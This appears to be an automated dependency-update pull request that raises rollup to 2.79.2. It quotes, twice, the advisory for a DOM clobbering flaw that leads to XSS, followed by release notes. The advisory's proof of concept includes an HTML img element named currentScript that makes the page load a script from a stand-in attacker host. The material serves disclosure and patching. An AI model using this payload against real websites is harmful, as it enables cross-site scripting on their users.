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chore(deps): update dependency rollup to v2.79.2 [security] (master) #1494

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This PR contains the following updates:

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rollup (source) devDependencies minor 2.70.1 -> 2.79.2 OpenSSF Scorecard

GitHub Vulnerability Alerts

CVE-2024-47068

Summary

We discovered a DOM Clobbering vulnerability in rollup when bundling scripts that use import.meta.url or with plugins that emit and reference asset files from code in cjs/umd/iife format. The DOM Clobbering gadget can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an img tag with an unsanitized name attribute) are present.

It's worth noting that we’ve identifed similar issues in other popular bundlers like Webpack (CVE-2024-43788), which might serve as a good reference.

Details

Backgrounds

DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. More for information about DOM Clobbering, here are some references:

[1] https://scnps.co/papers/sp23_domclob.pdf
[2] https://research.securitum.com/xss-in-amp4email-dom-clobbering/

Gadget found in rollup

We have identified a DOM Clobbering vulnerability in rollup bundled scripts, particularly when the scripts uses import.meta and set output in format of cjs/umd/iife. In such cases, rollup replaces meta property with the URL retrieved from document.currentScript.

https://github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L157-L162

https://github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L180-L185

However, this implementation is vulnerable to a DOM Clobbering attack. The document.currentScript lookup can be shadowed by an attacker via the browser's named DOM tree element access mechanism. This manipulation allows an attacker to replace the intended script element with a malicious HTML element. When this happens, the src attribute of the attacker-controlled element (e.g., an img tag ) is used as the URL for importing scripts, potentially leading to the dynamic loading of scripts from an attacker-controlled server.

PoC

Considering a website that contains the following main.js script, the devloper decides to use the rollup to bundle up the program: rollup main.js --format cjs --file bundle.js.

var s = document.createElement('script')
s.src = import.meta.url + 'extra.js'
document.head.append(s)

The output bundle.js is shown in the following code snippet.

'use strict';

var _documentCurrentScript = typeof document !== 'undefined' ? document.currentScript : null;
var s = document.createElement('script');
s.src = (typeof document === 'undefined' ? require('u' + 'rl').pathToFileURL(__filename).href : (_documentCurrentScript && False && _documentCurrentScript.src || new URL('bundle.js', document.baseURI).href)) + 'extra.js';
document.head.append(s);

Adding the rollup bundled script, bundle.js, as part of the web page source code, the page could load the extra.js file from the attacker's domain, attacker.controlled.server due to the introduced gadget during bundling. The attacker only needs to insert an img tag with the name attribute set to currentScript. This can be done through a website's feature that allows users to embed certain script-less HTML (e.g., markdown renderers, web email clients, forums) or via an HTML injection vulnerability in third-party JavaScript loaded on the page.

<!DOCTYPE html>
<html>
<head>
  <title>rollup Example</title>
  <!-- Attacker-controlled Script-less HTML Element starts--!>
  <img name="currentScript" src="https://attacker.controlled.server/"></img>
  <!-- Attacker-controlled Script-less HTML Element ends--!>
</head>
<script type="module" crossorigin src="bundle.js"></script>
<body>
</body>
</html>

Impact

This vulnerability can result in cross-site scripting (XSS) attacks on websites that include rollup-bundled files (configured with an output format of cjs, iife, or umd and use import.meta) and allow users to inject certain scriptless HTML tags without properly sanitizing the name or id attributes.

Patch

Patching the following two functions with type checking would be effective mitigations against DOM Clobbering attack.

const getRelativeUrlFromDocument = (relativePath: string, umd = false) =>
	getResolveUrl(
		`'${escapeId(relativePath)}', ${
			umd ? `typeof document === 'undefined' ? location.href : ` : ''
		}document.currentScript && document.currentScript.tagName.toUpperCase() === 'SCRIPT' && document.currentScript.src || document.baseURI`
	);
const getUrlFromDocument = (chunkId: string, umd = false) =>
	`${
		umd ? `typeof document === 'undefined' ? location.href : ` : ''
	}(${DOCUMENT_CURRENT_SCRIPT} && ${DOCUMENT_CURRENT_SCRIPT}.tagName.toUpperCase() === 'SCRIPT' &&${DOCUMENT_CURRENT_SCRIPT}.src || new URL('${escapeId(
		chunkId
	)}', document.baseURI).href)`;

DOM Clobbering Gadget found in rollup bundled scripts that leads to XSS

CVE-2024-47068 / GHSA-gcx4-mw62-g8wm

More information

Details

Summary

We discovered a DOM Clobbering vulnerability in rollup when bundling scripts that use import.meta.url or with plugins that emit and reference asset files from code in cjs/umd/iife format. The DOM Clobbering gadget can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an img tag with an unsanitized name attribute) are present.

It's worth noting that we’ve identifed similar issues in other popular bundlers like Webpack (CVE-2024-43788), which might serve as a good reference.

Details
Backgrounds

DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. More for information about DOM Clobbering, here are some references:

[1] https://scnps.co/papers/sp23_domclob.pdf
[2] https://research.securitum.com/xss-in-amp4email-dom-clobbering/

Gadget found in rollup

We have identified a DOM Clobbering vulnerability in rollup bundled scripts, particularly when the scripts uses import.meta and set output in format of cjs/umd/iife. In such cases, rollup replaces meta property with the URL retrieved from document.currentScript.

https://github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L157-L162

https://github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L180-L185

However, this implementation is vulnerable to a DOM Clobbering attack. The document.currentScript lookup can be shadowed by an attacker via the browser's named DOM tree element access mechanism. This manipulation allows an attacker to replace the intended script element with a malicious HTML element. When this happens, the src attribute of the attacker-controlled element (e.g., an img tag ) is used as the URL for importing scripts, potentially leading to the dynamic loading of scripts from an attacker-controlled server.

PoC

Considering a website that contains the following main.js script, the devloper decides to use the rollup to bundle up the program: rollup main.js --format cjs --file bundle.js.

var s = document.createElement('script')
s.src = import.meta.url + 'extra.js'
document.head.append(s)

The output bundle.js is shown in the following code snippet.

'use strict';

var _documentCurrentScript = typeof document !== 'undefined' ? document.currentScript : null;
var s = document.createElement('script');
s.src = (typeof document === 'undefined' ? require('u' + 'rl').pathToFileURL(__filename).href : (_documentCurrentScript && False && _documentCurrentScript.src || new URL('bundle.js', document.baseURI).href)) + 'extra.js';
document.head.append(s);

Adding the rollup bundled script, bundle.js, as part of the web page source code, the page could load the extra.js file from the attacker's domain, attacker.controlled.server due to the introduced gadget during bundling. The attacker only needs to insert an img tag with the name attribute set to currentScript. This can be done through a website's feature that allows users to embed certain script-less HTML (e.g., markdown renderers, web email clients, forums) or via an HTML injection vulnerability in third-party JavaScript loaded on the page.

<!DOCTYPE html>
<html>
<head>
  <title>rollup Example</title>
  <!-- Attacker-controlled Script-less HTML Element starts--!>
  <img name="currentScript" src="https://attacker.controlled.server/"></img>
  <!-- Attacker-controlled Script-less HTML Element ends--!>
</head>
<script type="module" crossorigin src="bundle.js"></script>
<body>
</body>
</html>
Impact

This vulnerability can result in cross-site scripting (XSS) attacks on websites that include rollup-bundled files (configured with an output format of cjs, iife, or umd and use import.meta) and allow users to inject certain scriptless HTML tags without properly sanitizing the name or id attributes.

Patch

Patching the following two functions with type checking would be effective mitigations against DOM Clobbering attack.

const getRelativeUrlFromDocument = (relativePath: string, umd = false) =>
	getResolveUrl(
		`'${escapeId(relativePath)}', ${
			umd ? `typeof document === 'undefined' ? location.href : ` : ''
		}document.currentScript && document.currentScript.tagName.toUpperCase() === 'SCRIPT' && document.currentScript.src || document.baseURI`
	);
const getUrlFromDocument = (chunkId: string, umd = false) =>
	`${
		umd ? `typeof document === 'undefined' ? location.href : ` : ''
	}(${DOCUMENT_CURRENT_SCRIPT} && ${DOCUMENT_CURRENT_SCRIPT}.tagName.toUpperCase() === 'SCRIPT' &&${DOCUMENT_CURRENT_SCRIPT}.src || new URL('${escapeId(
		chunkId
	)}', document.baseURI).href)`;

Severity

  • CVSS Score: 6.4 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).


Release Notes

rollup/rollup (rollup)

v2.79.2

Compare Source

v2.79.1

Compare Source

2022-09-22

Bug Fixes
  • Avoid massive performance degradation when creating thousands of chunks (#​4643)
Pull Requests

v2.79.0

Compare Source

2022-08-31

Features
  • Add amd.forceJsExtensionForImports to enforce using .js extensions for relative AMD imports (#​4607)
Pull Requests

v2.78.1

Compare Source

2022-08-19

Bug Fixes
  • Avoid inferring "arguments" as name for a default export placeholder variable (#​4613)
Pull Requests

v2.78.0

Compare Source

2022-08-14

Features
  • Support writing plugin hooks as objects with a "handler" property (#​4600)
  • Allow changing execution order per plugin hook (#​4600)
  • Add flag to execute plugins in async parallel hooks sequentially (#​4600)
Pull Requests

v2.77.3

Compare Source

2022-08-11

Bug Fixes
  • Correctly resolve preserveModulesRoot in Vite (#​4591)
Pull Requests

v2.77.2

Compare Source

2022-07-27

Bug Fixes
  • Avoid a rendering failure when mixing outputs with inlined and non-inlined dynamic imports (#​4589)
Pull Requests

v2.77.1

Compare Source

2022-07-26

Bug Fixes
  • Ensure IIFE output generates a global variable when generating ES5 (#​4588)
Pull Requests

v2.77.0

Compare Source

2022-07-15

Features
  • Introduce maxParallelFileOps to limit both read and write operations, default to 20 and replaces maxParallelFileRead (#​4570)
Bug Fixes
  • Avoid including variables referenced from return statements that are never reached (#​4573)
Pull Requests

v2.76.0

Compare Source

2022-07-08

Features
  • Allow setting a sourcmapBaseUrl for absolute paths in sourcemaps (#​4527)
Bug Fixes
  • Support absolute CLI plugin paths on Windows (#​4533)
Pull Requests

v2.75.7

Compare Source

2022-06-20

Bug Fixes
  • Mark Array.prototype.group/groupToMap as side effect free. (#​4531)
Pull Requests

v2.75.6

Compare Source

2022-06-07

Bug Fixes
  • Properly deoptimize "this" when using member expressions with getters/setters in for loops and update expressions (#​4522)
Pull Requests

v2.75.5

Compare Source

2022-06-01

Bug Fixes
  • Avoid crashes when using logical expressions for unused constructor arguments (#​4519)
  • Fix missing parameter defaults for calls from try statements and functions returned by functions (#​4520)
Pull Requests

v2.75.4

Compare Source

2022-05-31

Bug Fixes
  • Ensure parameter defaults are retained when a function is used as an object property (#​4516)
Pull Requests

v2.75.3

Compare Source

2022-05-29

Bug Fixes
  • Retain parameter defaults for functions that are defaults themselves (#​4515)
  • Track mutations for objects as default values (#​4515)
Pull Requests

v2.75.2

Compare Source

v2.75.1

Compare Source

2022-05-28

Pull Requests

v2.75.0

Compare Source

2022-05-27

Features
  • Re-implement default parameter tree-shaking for top-level functions (#​4510)
  • Do not consider calling string methods like .trim() on template literals a side effect (#​4511)
Pull Requests

v2.74.1

Compare Source

2022-05-19

Bug Fixes
  • Revert #​4498 until some issues are understood and resolved

v2.74.0

Compare Source

2022-05-19

Features
  • Remove unneeded default values for function parameters (#​4498)
Bug Fixes
  • Use a consistent mechanism to resolve the config file to avoid issues on Windows (#​4501)
  • Avoid an inaccurate warning about an event emitter leak for complicated builds (#​4502)
  • Ensure that reexporting values from other chunks via dynamic imports does not reference non-imported variables (#​4499)
Pull Requests

v2.73.0

Compare Source

2022-05-13

Features
  • Do not treat Object.defineProperty/ies as side effect when called on an unused object (#​4493)
  • Do not assume that assigning a property can create a getter with side effects (#​4493)
  • Do not treat string.prototype.replace(All) as side effect when used with two literals (#​4493)
Bug Fixes
  • Detect side effects when manually declaring getters on functions (#​4493)
Pull Requests

v2.72.1

Compare Source

2022-05-07

Bug Fixes
  • Improve tree-shaking of classes with super classes in certain scenarios (#​4489)
Pull Requests

v2.72.0

Compare Source

2022-05-05

Features
  • Add CLI hooks to run external commands at certain points in watch mode (#​4457)
Bug Fixes
  • Fix an issue that could accidentally treat relevant assignments as side effect free (#​4486)
Pull Requests

v2.71.1

Compare Source

2022-04-30

Bug Fixes
  • Allow importing loadConfigFile without extension (#​4483)
Pull Requests

v2.71.0

Compare Source

2022-04-30

v2.70.2

Compare Source

2022-04-15

Bug Fixes
  • Do not enforce undefined return values in TypeScript types (#​4463)
Pull Requests

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